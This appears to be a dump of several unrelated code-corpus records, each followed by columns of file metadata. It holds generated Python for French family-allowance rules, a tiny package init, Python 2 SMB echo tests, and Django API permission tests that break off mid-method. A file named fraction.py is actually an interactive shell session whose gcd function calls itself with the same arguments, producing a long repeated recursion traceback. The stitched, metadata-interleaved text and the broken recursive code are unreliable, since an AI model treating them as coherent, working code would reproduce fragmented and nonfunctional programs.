raise NoValueProvided(SourcePosition(filename="./securite_sociale_L.catala_fr",
start_line=230, start_column=5,
end_line=234, end_column=6,
law_headings=["Article L521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie législative",
"Code de la sécurité sociale"]))
assert local_var_501
return AllocationsFamilialesOut(montant_verse_out=montant_verse_499)
def interface_allocations_familiales(interface_allocations_familiales_in_502: InterfaceAllocationsFamilialesIn):
i_date_courante_503 = interface_allocations_familiales_in_502.i_date_courante_in
i_enfants_504 = interface_allocations_familiales_in_502.i_enfants_in
i_ressources_menage_505 = interface_allocations_familiales_in_502.i_ressources_menage_in
i_residence_506 = interface_allocations_familiales_in_502.i_residence_in
i_personne_charge_effective_permanente_est_parent_507 = interface_allocations_familiales_in_502.i_personne_charge_effective_permanente_est_parent_in
i_personne_charge_effective_permanente_remplit_titre__i_508 = interface_allocations_familiales_in_502.i_personne_charge_effective_permanente_remplit_titre_I_in
i_avait_enfant_a_charge_avant_1er_janvier_2012_509 = interface_allocations_familiales_in_502.i_avait_enfant_a_charge_avant_1er_janvier_2012_in
try:
try:
try:
def local_var_512(enfant_513: Any):
if ((enfant_513.d_date_de_naissance +
duration_of_numbers(3, 0, 0)) >=
i_date_courante_503):
local_var_514 = SituationObligationScolaire(SituationObligationScolaire_Code.Avant,
Unit())
else:
if ((enfant_513.d_date_de_naissance +
duration_of_numbers(16, 0, 0)) >=
i_date_courante_503):
local_var_514 = SituationObligationScolaire(SituationObligationScolaire_Code.Pendant,
Unit())
else:
local_var_514 = SituationObligationScolaire(SituationObligationScolaire_Code.Apres,
Unit())
return Enfant(identifiant=enfant_513.d_identifiant,
obligation_scolaire=local_var_514,
remuneration_mensuelle=enfant_513.d_remuneration_mensuelle,
date_de_naissance=enfant_513.d_date_de_naissance,
age=year_of_date((date_of_numbers(0, 1, 1) +
(i_date_courante_503 -
enfant_513.d_date_de_naissance))),
prise_en_charge=enfant_513.d_prise_en_charge,
a_deja_ouvert_droit_aux_allocations_familiales=enfant_513.d_a_deja_ouvert_droit_aux_allocations_familiales)
local_var_511 = list_map(local_var_512, i_enfants_504)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./epilogue.catala_fr",
start_line=74, start_column=11,
end_line=74, end_column=27,
law_headings=["Interface du programme",
"Épilogue", "Décrets divers"]))
enfants_a_charge_510 = log_variable_definition(["InterfaceAllocationsFamiliales",
"enfants_à_charge"], local_var_511)
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./epilogue.catala_fr",
start_line=90, start_column=20,
end_line=90, end_column=69,
law_headings=["Interface du programme", "Épilogue",
"Décrets divers"]), i_personne_charge_effective_permanente_est_parent_507):
local_var_517 = True
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
local_var_517 = False
local_var_516 = log_variable_definition(["InterfaceAllocationsFamiliales",
"allocations_familiales.personne_charge_effective_permanente_est_parent"],
local_var_517)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=90, start_column=10,
end_line=90, end_column=57,
law_headings=["Prologue"]))
allocations_familiales_dot_personne_charge_effective_permanente_est_parent_515 = local_var_516
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./epilogue.catala_fr",
start_line=93, start_column=20,
end_line=93, end_column=74,
law_headings=["Interface du programme", "Épilogue",
"Décrets divers"]), i_personne_charge_effective_permanente_remplit_titre__i_508):
local_var_520 = True
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
local_var_520 = False
local_var_519 = log_variable_definition(["InterfaceAllocationsFamiliales",
"allocations_familiales.personne_charge_effective_permanente_remplit_titre_I"],
local_var_520)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=91, start_column=10,
end_line=91, end_column=62,
law_headings=["Prologue"]))
allocations_familiales_dot_personne_charge_effective_permanente_remplit_titre__i_518 = local_var_519
try:
try:
try:
local_var_523 = i_ressources_menage_505
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_522 = log_variable_definition(["InterfaceAllocationsFamiliales",
"allocations_familiales.ressources_ménage"], local_var_523)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=92, start_column=10,
end_line=92, end_column=27,
law_headings=["Prologue"]))
allocations_familiales_dot_ressources_menage_521 = local_var_522
try:
try:
try:
local_var_526 = i_residence_506
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_525 = log_variable_definition(["InterfaceAllocationsFamiliales",
"allocations_familiales.résidence"], local_var_526)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=93, start_column=10,
end_line=93, end_column=19,
law_headings=["Prologue"]))
allocations_familiales_dot_residence_524 = local_var_525
try:
try:
try:
local_var_529 = i_date_courante_503
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_528 = log_variable_definition(["InterfaceAllocationsFamiliales",
"allocations_familiales.date_courante"], local_var_529)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=96, start_column=10,
end_line=96, end_column=23,
law_headings=["Prologue"]))
allocations_familiales_dot_date_courante_527 = local_var_528
try:
try:
try:
local_var_532 = enfants_a_charge_510
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_531 = log_variable_definition(["InterfaceAllocationsFamiliales",
"allocations_familiales.enfants_à_charge"], local_var_532)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=99, start_column=10,
end_line=99, end_column=26,
law_headings=["Prologue"]))
allocations_familiales_dot_enfants_a_charge_530 = local_var_531
try:
try:
try:
if log_decision_taken(SourcePosition(filename="./epilogue.catala_fr",
start_line=96, start_column=20,
end_line=96, end_column=66,
law_headings=["Interface du programme", "Épilogue",
"Décrets divers"]), i_avait_enfant_a_charge_avant_1er_janvier_2012_509):
local_var_535 = True
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
local_var_535 = False
local_var_534 = log_variable_definition(["InterfaceAllocationsFamiliales",
"allocations_familiales.avait_enfant_à_charge_avant_1er_janvier_2012"],
local_var_535)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=120, start_column=10,
end_line=120, end_column=54,
law_headings=["Prologue"]))
allocations_familiales_dot_avait_enfant_a_charge_avant_1er_janvier_2012_533 = local_var_534
result_536 = log_end_call(["InterfaceAllocationsFamiliales",
"allocations_familiales", "AllocationsFamiliales"],
log_begin_call(["InterfaceAllocationsFamiliales",
"allocations_familiales", "AllocationsFamiliales"],
allocations_familiales,
AllocationsFamilialesIn(personne_charge_effective_permanente_est_parent_in=allocations_familiales_dot_personne_charge_effective_permanente_est_parent_515,
personne_charge_effective_permanente_remplit_titre_I_in=allocations_familiales_dot_personne_charge_effective_permanente_remplit_titre__i_518,
ressources_menage_in=allocations_familiales_dot_ressources_menage_521,
residence_in=allocations_familiales_dot_residence_524,
date_courante_in=allocations_familiales_dot_date_courante_527,
enfants_a_charge_in=allocations_familiales_dot_enfants_a_charge_530,
avait_enfant_a_charge_avant_1er_janvier_2012_in=allocations_familiales_dot_avait_enfant_a_charge_avant_1er_janvier_2012_533)))
allocations_familiales_dot_montant_verse_537 = result_536.montant_verse_out
try:
try:
try:
local_var_539 = allocations_familiales_dot_montant_verse_537
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./epilogue.catala_fr",
start_line=78, start_column=10,
end_line=78, end_column=25,
law_headings=["Interface du programme",
"Épilogue", "Décrets divers"]))
i_montant_verse_538 = log_variable_definition(["InterfaceAllocationsFamiliales",
"i_montant_versé"], local_var_539)
return InterfaceAllocationsFamilialesOut(i_montant_verse_out=i_montant_verse_538)
| 76.137997
| 396
| 0.383342
| 21,132
| 317,800
| 5.359975
| 0.040886
| 0.036374
| 0.045424
| 0.028517
| 0.883488
| 0.832988
| 0.771478
| 0.727714
| 0.701361
| 0.681258
| 0
| 0.061369
| 0.568376
| 317,800
| 4,173
| 397
| 76.156243
| 0.764045
| 0.000205
| 0
| 0.653232
| 1
| 0.003802
| 0.105416
| 0.032008
| 0
| 0
| 0
| 0
| 0.000253
| 1
| 0.057034
| false
| 0.000253
| 0.00076
| 0.016223
| 0.139164
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c35e9acc16477719fe87c47513ffae09f91108e5
| 38
|
py
|
Python
|
capsules/__init__.py
|
Ralphyan/VectorCapsNet
|
ea6911c44821bdf473d25edcc1b58248dad31f79
|
[
"MIT"
] | 1
|
2022-02-08T09:33:16.000Z
|
2022-02-08T09:33:16.000Z
|
capsules/__init__.py
|
Ralphyan/VectorCapsNet
|
ea6911c44821bdf473d25edcc1b58248dad31f79
|
[
"MIT"
] | null | null | null |
capsules/__init__.py
|
Ralphyan/VectorCapsNet
|
ea6911c44821bdf473d25edcc1b58248dad31f79
|
[
"MIT"
] | null | null | null |
from . import core
from . import nets
| 12.666667
| 18
| 0.736842
| 6
| 38
| 4.666667
| 0.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 38
| 2
| 19
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6f250ee4f10baf9b2ad19a137501d6e657e670c4
| 5,185
|
py
|
Python
|
test/echo_test.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
test/echo_test.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
test/echo_test.py
|
abhilashabhardwaj/pike
|
a1ad05b37231d8ac0a0442ab8d32a363e75ada9a
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (C) EMC Corporation. All rights reserved.
#
# Module Name:
#
# echo.py
#
# Abstract:
#
# Basic echo send/receive testing
#
# Authors: Lingaraj Gowdar (lingaraj.gowdar@calsoftinc.com)
#
import pike.model
import pike.smb2
import pike.test
import random
import array
import utils
# All tests for the echo request/response
class EchoTest(pike.test.PikeTest):
def test_01_echo_with_valid_struct_size(self):
try:
print "\n--------------------ECHO_TC 01 --------------------"
print "Test case to verify echo request with valid structure size."
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Sending Negotiate request..."
conn = pike.model.Client().connect(self.server, self.port).negotiate()
print "Negotiate successful."
print "Sending Session setup request..."
chan = conn.session_setup(self.creds)
print "Session setup successful."
print "Sending Echo request..."
conv_obj = utils.Convenience()
echo_packet = conv_obj.echo(chan,structure_size=4)
res = conv_obj.transceive(chan,echo_packet)
print "Echo request is successfully processed."
actual_status = str(res[0].status)
except Exception as e:
actual_status = str(e)
print "Actual status: ",actual_status
self.assertIn(expected_status,actual_status,"\nTC 01 failed.")
print "TC 01 Passed"
def test_02_echo_with_invalid_struct_size(self):
try:
print "\n--------------------ECHO_TC 02 --------------------"
print "Test case to verify echo request with invalid structure size."
expected_status = 'STATUS_INVALID_PARAMETER'
print "Expected status: ",expected_status
print "Sending Negotiate request..."
conn = pike.model.Client().connect(self.server, self.port).negotiate()
print "Negotiate successful."
print "Sending Session setup request..."
chan = conn.session_setup(self.creds)
print "Session setup successful."
print "Sending Echo request..."
conv_obj=utils.Convenience()
echo_packet = conv_obj.echo(chan,structure_size=5)
res = conv_obj.transceive(chan,echo_packet)
print "Echo request is successfully processed."
actual_status = str(res[0].status)
except Exception as e:
actual_status = str(e)
print "Actual status: ",actual_status
self.assertIn(expected_status,actual_status,"\nTC 02 failed.")
print "TC 02 Passed"
def test_03_echo_with_invalid_reserved_value(self):
try:
print "\n--------------------ECHO_TC 03 --------------------"
print "Test case to verify echo request with invalid reserved value."
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Sending Negotiate request..."
conn = pike.model.Client().connect(self.server, self.port).negotiate()
print "Negotiate successful."
print "Sending Session setup request..."
chan = conn.session_setup(self.creds)
print "Session setup successful."
print "Sending Echo request..."
conv_obj=utils.Convenience()
echo_packet = conv_obj.echo(chan,reserved=5)
res = conv_obj.transceive(chan,echo_packet)
print "Echo request is successfully processed."
actual_status = str(res[0].status)
except Exception as e:
actual_status = str(e)
print "Actual status: ",actual_status
self.assertIn(expected_status,actual_status,"\nTC 03 failed.")
print "TC 03 Passed"
def test_04_echo_with_valid_reserved_value(self):
try:
print "\n--------------------ECHO_TC 04 --------------------"
print "Test case to verify echo request with valid reserved value."
expected_status = 'STATUS_SUCCESS'
print "Expected status: ",expected_status
print "Sending Negotiate request..."
conn = pike.model.Client().connect(self.server, self.port).negotiate()
print "Negotiate successful."
print "Sending Session setup request..."
chan = conn.session_setup(self.creds)
print "Session setup successful."
print "Sending Echo request..."
conv_obj=utils.Convenience()
echo_packet = conv_obj.echo(chan,reserved=0)
res = conv_obj.transceive(chan,echo_packet)
print "Echo request is successfully processed."
actual_status = str(res[0].status)
except Exception as e:
actual_status = str(e)
print "Actual status: ",actual_status
self.assertIn(expected_status,actual_status,"\nTC 04 failed.")
print "TC 04 Passed"
| 42.85124
| 83
| 0.5892
| 566
| 5,185
| 5.243816
| 0.167845
| 0.080863
| 0.059299
| 0.01752
| 0.835243
| 0.819744
| 0.819744
| 0.819744
| 0.778639
| 0.722035
| 0
| 0.011227
| 0.295661
| 5,185
| 120
| 84
| 43.208333
| 0.801479
| 0.04378
| 0
| 0.676768
| 0
| 0
| 0.295789
| 0.02904
| 0
| 0
| 0
| 0
| 0.040404
| 0
| null | null | 0.040404
| 0.060606
| null | null | 0.444444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
6f56526f1aee2b0ff7e88583ddd2d079ced7d222
| 10,122
|
py
|
Python
|
fraction.py
|
socksgin/CollegeCode
|
ba283562cd3fc327f0433caa2edda58145d642c7
|
[
"bzip2-1.0.6",
"Unlicense"
] | null | null | null |
fraction.py
|
socksgin/CollegeCode
|
ba283562cd3fc327f0433caa2edda58145d642c7
|
[
"bzip2-1.0.6",
"Unlicense"
] | null | null | null |
fraction.py
|
socksgin/CollegeCode
|
ba283562cd3fc327f0433caa2edda58145d642c7
|
[
"bzip2-1.0.6",
"Unlicense"
] | null | null | null |
Python 3.2.3 (default, Apr 11 2012, 07:15:24) [MSC v.1500 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> ================================ RESTART ================================
>>>
>>> 2**20
1048576
>>> 2**10
1024
>>> ================================ RESTART ================================
>>>
Traceback (most recent call last):
File "C:\Python32\fraction.py", line 1, in <module>
from fraction import *
File "C:\Python32\fraction.py", line 54, in <module>
x = Fraction(1,8)
File "C:\Python32\fraction.py", line 20, in __init__
g = gcd(n,d)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
return gcd(a,b)
File "C:\Python32\fraction.py", line 7, in gcd
| 35.515789
| 83
| 0.611836
| 1,816
| 10,122
| 3.40804
| 0.032489
| 0.11068
| 0.287769
| 0.464857
| 0.963968
| 0.963968
| 0.950881
| 0.950881
| 0.950881
| 0.950881
| 0
| 0.057763
| 0.221794
| 10,122
| 284
| 84
| 35.640845
| 0.727942
| 0
| 0
| 0.954225
| 0
| 0
| 0.32283
| 0.320289
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.003521
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
48cd5bc976fd05e5cf577c8a294c68880c4745f3
| 12,753
|
py
|
Python
|
mayan/apps/user_management/tests/test_api.py
|
gerry-sabar/Mayan-EDMS
|
c51f8d213535bd8ed7e94d170ed688dc54a874e9
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/user_management/tests/test_api.py
|
gerry-sabar/Mayan-EDMS
|
c51f8d213535bd8ed7e94d170ed688dc54a874e9
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/user_management/tests/test_api.py
|
gerry-sabar/Mayan-EDMS
|
c51f8d213535bd8ed7e94d170ed688dc54a874e9
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from rest_framework import status
from mayan.apps.rest_api.tests import BaseAPITestCase
from ..permissions import (
permission_group_create, permission_group_delete,
permission_group_edit, permission_group_view,
permission_user_create, permission_user_delete,
permission_user_edit, permission_user_view
)
from .mixins import (
GroupAPITestMixin, GroupTestMixin, UserAPITestMixin, UserTestMixin
)
class GroupAPITestCase(GroupAPITestMixin, GroupTestMixin, BaseAPITestCase):
def test_group_create_no_permission(self):
group_count = Group.objects.count()
response = self._request_test_group_create_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(Group.objects.count(), group_count)
def test_group_create_with_permission(self):
self.grant_permission(permission=permission_group_create)
group_count = Group.objects.count()
response = self._request_test_group_create_api_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Group.objects.count(), group_count + 1)
def test_group_delete_no_access(self):
self._create_test_group()
group_count = Group.objects.count()
response = self._request_test_group_delete_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(Group.objects.count(), group_count)
def test_group_delete_with_access(self):
self._create_test_group()
self.grant_access(obj=self.test_group, permission=permission_group_delete)
group_count = Group.objects.count()
response = self._request_test_group_delete_api_view()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(Group.objects.count(), group_count - 1)
def test_group_edit_via_patch_no_access(self):
self._create_test_group()
group_name = self.test_group.name
response = self._request_test_group_edit_patch_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_group.refresh_from_db()
self.assertEqual(self.test_group.name, group_name)
def test_group_edit_via_patch_with_access(self):
self._create_test_group()
self.grant_access(obj=self.test_group, permission=permission_group_edit)
group_name = self.test_group.name
response = self._request_test_group_edit_patch_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_group.refresh_from_db()
self.assertNotEqual(self.test_group.name, group_name)
def test_group_edit_via_put_no_access(self):
self._create_test_group()
group_name = self.test_group.name
response = self._request_test_group_edit_put_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.test_group.refresh_from_db()
self.assertEqual(self.test_group.name, group_name)
def test_group_edit_via_put_with_access(self):
self._create_test_group()
self.grant_access(obj=self.test_group, permission=permission_group_edit)
group_name = self.test_group.name
response = self._request_test_group_edit_put_api_view()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.test_group.refresh_from_db()
self.assertNotEqual(self.test_group.name, group_name)
class UserAPITestCase(UserAPITestMixin, UserTestMixin, BaseAPITestCase):
def test_user_create_api_view_no_permission(self):
user_count = get_user_model().objects.count()
response = self._request_test_user_create_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(get_user_model().objects.count(), user_count)
def test_user_create_api_view_with_permission(self):
self.grant_permission(permission=permission_user_create)
user_count = get_user_model().objects.count()
response = self._request_test_user_create_api_view()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(get_user_model().objects.count(), user_count + 1)
def test_user_delete_no_access(self):
self._create_test_user()
user_count = get_user_model().objects.count()
response = self._request_test_user_delete_api_view()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(get_user_model().objects.count(), user_count)
def test_user_delete_with_access(self):
self._create_test_user()
